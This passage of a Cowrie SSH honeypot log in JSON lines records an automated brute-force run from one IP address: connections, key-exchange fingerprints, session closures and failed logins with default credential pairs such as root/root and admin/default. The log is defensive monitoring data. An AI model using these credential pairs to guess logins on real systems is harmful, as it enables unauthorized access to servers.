xAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:27.496079Z","src_ip":"212.227.235.229","session":"c4dd2e130b3e"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:28.541236Z","src_ip":"212.227.235.229","session":"8419b8ec7e3b"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:30.847161Z","src_ip":"212.227.235.229","session":"64471ad4e36a"}
{"eventid":"cowrie.session.closed","duration":"47.6","message":"Connection lost after 47.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:32.122247Z","src_ip":"212.227.235.229","session":"64471ad4e36a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56772,"dst_ip":"1.2.3.4","dst_port":22,"session":"c49b024468ad","protocol":"ssh","message":"New connection: 212.227.235.229:56772 (1.2.3.4:22) [session: c49b024468ad]","sensor":"my-vps","timestamp":"2025-08-26T04:05:37.580519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:37.582451Z","src_ip":"212.227.235.229","session":"c49b024468ad"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:37.828880Z","src_ip":"212.227.235.229","session":"c49b024468ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57140,"dst_ip":"1.2.3.4","dst_port":22,"session":"78d3ad51fb5e","protocol":"ssh","message":"New connection: 212.227.235.229:57140 (1.2.3.4:22) [session: 78d3ad51fb5e]","sensor":"my-vps","timestamp":"2025-08-26T04:05:39.899138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:39.904550Z","src_ip":"212.227.235.229","session":"78d3ad51fb5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57146,"dst_ip":"1.2.3.4","dst_port":22,"session":"17bc4c56080e","protocol":"ssh","message":"New connection: 212.227.235.229:57146 (1.2.3.4:22) [session: 17bc4c56080e]","sensor":"my-vps","timestamp":"2025-08-26T04:05:40.518347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:40.521689Z","src_ip":"212.227.235.229","session":"17bc4c56080e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:40.764839Z","src_ip":"212.227.235.229","session":"17bc4c56080e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48598,"dst_ip":"1.2.3.4","dst_port":22,"session":"c661cfbbf7d2","protocol":"ssh","message":"New connection: 212.227.235.229:48598 (1.2.3.4:22) [session: c661cfbbf7d2]","sensor":"my-vps","timestamp":"2025-08-26T04:05:41.328588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:41.329427Z","src_ip":"212.227.235.229","session":"c661cfbbf7d2"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:41.361344Z","src_ip":"212.227.235.229","session":"f945857751b6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:41.804579Z","src_ip":"212.227.235.229","session":"78d3ad51fb5e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:42.313397Z","src_ip":"212.227.235.229","session":"c661cfbbf7d2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:42.825067Z","src_ip":"212.227.235.229","session":"c49b024468ad"}
{"eventid":"cowrie.session.closed","duration":"56.5","message":"Connection lost after 56.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:43.268420Z","src_ip":"212.227.235.229","session":"f945857751b6"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:44.100919Z","src_ip":"212.227.235.229","session":"c661cfbbf7d2"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:44.699753Z","src_ip":"212.227.235.229","session":"c49b024468ad"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:45.353708Z","src_ip":"212.227.235.229","session":"c661cfbbf7d2"}
{"eventid":"cowrie.session.closed","duration":"28.4","message":"Connection lost after 28.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:47.262177Z","src_ip":"212.227.235.229","session":"aa052d0beb32"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T04:05:49.035517Z","src_ip":"212.227.235.229","session":"78d3ad51fb5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56644,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cf9bab7fd89","protocol":"ssh","message":"New connection: 212.227.235.229:56644 (1.2.3.4:22) [session: 2cf9bab7fd89]","sensor":"my-vps","timestamp":"2025-08-26T04:05:49.741021Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56634,"dst_ip":"1.2.3.4","dst_port":22,"session":"4425036344c9","protocol":"ssh","message":"New connection: 212.227.235.229:56634 (1.2.3.4:22) [session: 4425036344c9]","sensor":"my-vps","timestamp":"2025-08-26T04:05:49.893550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:49.903143Z","src_ip":"212.227.235.229","session":"4425036344c9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:05:50.192333Z","src_ip":"212.227.235.229","session":"4425036344c9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:50.419415Z","src_ip":"212.227.235.229","session":"2cf9bab7fd89"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:05:50.946014Z","src_ip":"212.227.235.229","session":"78d3ad51fb5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57160,"dst_ip":"1.2.3.4","dst_port":22,"session":"35fc0621934c","protocol":"ssh","message":"New connection: 212.227.235.229:57160 (1.2.3.4:22) [session: 35fc0621934c]","sensor":"my-vps","timestamp":"2025-08-26T04:05:52.227599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:52.268501Z","src_ip":"212.227.235.229","session":"35fc0621934c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34090,"dst_ip":"1.2.3.4","dst_port":22,"session":"929eb07058fb","protocol":"ssh","message":"New connection: 212.227.235.229:34090 (1.2.3.4:22) [session: 929eb07058fb]","sensor":"my-vps","timestamp":"2025-08-26T04:05:52.285750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:05:52.396545Z","src_ip":"212.227.235.229","session":"929eb07058fb"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-9